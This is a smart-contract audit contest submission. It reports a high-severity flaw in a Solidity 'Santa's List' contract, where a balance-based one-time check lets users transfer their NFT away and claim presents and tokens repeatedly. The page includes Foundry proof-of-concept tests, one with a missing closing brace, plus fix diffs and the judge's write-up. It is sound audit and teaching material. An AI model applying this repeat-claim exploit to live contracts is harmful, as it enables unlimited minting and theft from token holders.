Santa's List

AI First Flight #3

Beginner FriendlyFoundry

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

NFT Transfer bypass

lordbolton

Root + Impact

Description

The collectPresent() function is designed to allow users who are marked as NICE or EXTRA_NICE to collect their Christmas present (NFT) exactly once. To enforce this one-time collection rule, the function checks if the user's NFT balance is greater than zero before minting a new present.
The duplicate collection check uses balanceOf(msg.sender) > 0 which only verifies the current NFT balance at the moment of calling. Since ERC721 tokens are transferable, users can transfer their NFT to another address after collecting, reducing their balance to zero, and then call collectPresent() again to receive additional presents and SantaTokens unlimited times.

function collectPresent() external {

if (block.timestamp < CHRISTMAS_2023_BLOCK_TIME) {

revert SantasList__NotChristmasYet();

}

@> if (balanceOf(msg.sender) > 0) { // Only checks current balance, not collection history

revert SantasList__AlreadyCollected();

}

if (s_theListCheckedOnce[msg.sender] == Status.NICE && s_theListCheckedTwice[msg.sender] == Status.NICE) {

_mintAndIncrement();

return;

} else if (

s_theListCheckedOnce[msg.sender] == Status.EXTRA_NICE

&& s_theListCheckedTwice[msg.sender] == Status.EXTRA_NICE

) {

_mintAndIncrement();

@> i_santaToken.mint(msg.sender); // EXTRA_NICE users get SantaTokens each time

return;

}

revert SantasList__NotNice();

}

Risk

Likelihood:

Any user who has been checked twice as NICE or EXTRA_NICE can exploit this vulnerability at any time after Christmas 2023 by simply transferring their NFT and calling the function again
EXTRA_NICE users have additional motivation to exploit this since they receive 1e18 SantaTokens with each collection, enabling unlimited token minting through repeated transfers and collections

Impact:

Unlimited NFT minting breaks the one-present-per-person rule, allowing attackers to mint as many NFTs as desired by transferring between addresses
EXTRA_NICE users can mint unlimited SantaTokens (1e18 per collection), causing severe token inflation and economic collapse of the entire token ecosystem
The accumulated SantaTokens can then be used maliciously in combination with other vulnerabilities to further exploit the system or flood the market

Proof of Concept

// SPDX-License-Identifier: MIT

pragma solidity 0.8.22;

import {Test} from "forge-std/Test.sol";

import {SantasList} from "../../src/SantasList.sol";

import {SantaToken} from "../../src/SantaToken.sol";

contract ExploitDuplicateCollectionTest is Test {

SantasList santasList;

SantaToken santaToken;

address santa = makeAddr("santa");

address attacker = makeAddr("attacker");

address accomplice = makeAddr("accomplice");

function setUp() public {

vm.prank(santa);

santasList = new SantasList();

santaToken = SantaToken(santasList.getSantaToken());

}

function testExploitMassiveTokenInflation() public {

// Setup

vm.startPrank(santa);

santasList.checkList(attacker, SantasList.Status.EXTRA_NICE);

santasList.checkTwice(attacker, SantasList.Status.EXTRA_NICE);

vm.stopPrank();

vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);

vm.startPrank(attacker);

// Exploit: Collect 100 times by transferring NFTs

for (uint i = 0; i < 100; i++) {

santasList.collectPresent();

// Transfer NFT to reset balance (except last one)

if (i < 99) {

santasList.transferFrom(attacker, accomplice, i);

}

vm.stopPrank();

// Attacker minted 100e18 SantaTokens instead of 1e18!

assertEq(santaToken.balanceOf(attacker), 100e18);

// Accomplice holds 99 NFTs

assertEq(santasList.balanceOf(accomplice), 99);

}

Recommended Mitigation

+ // Add state variable to track collection history

+ mapping(address => bool) private s_hasCollected;

function collectPresent() external {

if (block.timestamp < CHRISTMAS_2023_BLOCK_TIME) {

revert SantasList__NotChristmasYet();

}

- if (balanceOf(msg.sender) > 0) {

- revert SantasList__AlreadyCollected();

- }

+ if (s_hasCollected[msg.sender]) {

+ revert SantasList__AlreadyCollected();

+ }

if (s_theListCheckedOnce[msg.sender] == Status.NICE

&& s_theListCheckedTwice[msg.sender] == Status.NICE) {

_mintAndIncrement();

+ s_hasCollected[msg.sender] = true;

return;

} else if (s_theListCheckedOnce[msg.sender] == Status.EXTRA_NICE

&& s_theListCheckedTwice[msg.sender] == Status.EXTRA_NICE) {

_mintAndIncrement();

i_santaToken.mint(msg.sender);

+ s_hasCollected[msg.sender] = true;

return;

}

revert SantasList__NotNice();

}

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 14 days ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-04] Any `NICE` or `EXTRA_NICE` user is able to call `collectPresent` function multiple times.

## Description `collectPresent` function is callable by any address, but the call will succeed only if the user is registered as `NICE` or `EXTRA_NICE` in SantasList contract. In order to prevent users to collect presents multiple times, the following check is implemented: ``` if (balanceOf(msg.sender) > 0) { revert SantasList__AlreadyCollected(); } ``` Nevertheless, there is an issue with this check. Users could send their newly minted NFTs to another wallet, allowing them to pass that check as `balanceOf(msg.sender)` will be `0` after transferring the NFT. ## Vulnerability Details Let's imagine a scenario where an `EXTRA_NICE` user wants to collect present when it is Christmas time. The user will call `collectPresent` function and will get 1 NFT and `1e18` SantaTokens. This user could now call `safetransferfrom` ERC-721 function in order to send the NFT to another wallet, while keeping SantaTokens on the same wallet (or send them as well, it doesn't matter). After that, it is possible to call `collectPresent` function again as ``balanceOf(msg.sender)` will be `0` again. ## Impact The impact of this vulnerability is HIGH as it allows any `NICE` user to mint as much NFTs as wanted, and it also allows any `EXTRA_NICE` user to mint as much NFTs and SantaTokens as desired. ## Proof of Concept The following tests shows that any `NICE` or `EXTRA_NICE` user is able to call `collectPresent` function again after transferring the newly minted NFT to another wallet. - In the case of `NICE` users, it will be possible to mint an infinity of NFTs, while transferring all of them in another wallet hold by the user. - In the case of `EXTRA_NICE` users, it will be possible to mint an infinity of NFTs and an infinity of SantaTokens. ``` function testExtraNiceCanCollectTwice() external { vm.startPrank(santa); // Santa checks twice the user as EXTRA_NICE santasList.checkList(user, SantasList.Status.EXTRA_NICE); santasList.checkTwice(user, SantasList.Status.EXTRA_NICE); vm.stopPrank(); // It is Christmas time! vm.warp(1_703_480_381); vm.startPrank(user); // User collects 1 NFT + 1e18 SantaToken santasList.collectPresent(); // User sends the minted NFT to another wallet santasList.safeTransferFrom(user, makeAddr("secondWallet"), 0); // User collect present again santasList.collectPresent(); vm.stopPrank(); // Users now owns 2e18 tokens, after calling 2 times collectPresent function successfully assertEq(santaToken.balanceOf(user), 2e18); } ``` ## Recommendations SantasList should implement in its storage a mapping to keep track of addresses which already collected present through `collectPresent` function. We could declare as a state variable : ``` mapping(address user => bool) private hasClaimed; ``` and then modify `collectPresent` function as follows: ``` function collectPresent() external { // use SantasList__AlreadyCollected custom error to save gas require(!hasClaimed[msg.sender], "user already collected present"); if (block.timestamp < CHRISTMAS_2023_BLOCK_TIME) { revert SantasList__NotChristmasYet(); } if (s_theListCheckedOnce[msg.sender] == Status.NICE && s_theListCheckedTwice[msg.sender] == Status.NICE) { _mintAndIncrement(); hasClaimed[msg.sender] = true; return; } else if ( s_theListCheckedOnce[msg.sender] == Status.EXTRA_NICE && s_theListCheckedTwice[msg.sender] == Status.EXTRA_NICE ) { _mintAndIncrement(); i_santaToken.mint(msg.sender); hasClaimed[msg.sender] = true; return; } revert SantasList__NotNice(); } ``` We just added a check that `hasClaimed[msg.sender]` is `false` to execute the rest of the function, while removing the check on `balanceOf`. Once present is collected, either for `NICE` or `EXTRA_NICE` people, we update `hasClaimed[msg.sender]` to `true`. This will prevent user to call `collectPresent` function. If you run the previous test with this new implementation, it wail fail with the error `user already collected present`. Here is a new test that checks the new implementation works as desired: ``` function testCorrectCollectPresentImpl() external { vm.startPrank(santa); // Santa checks twice the user as EXTRA_NICE santasList.checkList(user, SantasList.Status.EXTRA_NICE); santasList.checkTwice(user, SantasList.Status.EXTRA_NICE); vm.stopPrank(); // It is Christmas time! vm.warp(1_703_480_381); vm.startPrank(user); // User collects 1 NFT + 1e18 SantaToken santasList.collectPresent(); // User sends the minted NFT to another wallet santasList.safeTransferFrom(user, makeAddr("secondWallet"), 0); vm.expectRevert("user already collected present"); santasList.collectPresent(); vm.stopPrank(); } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!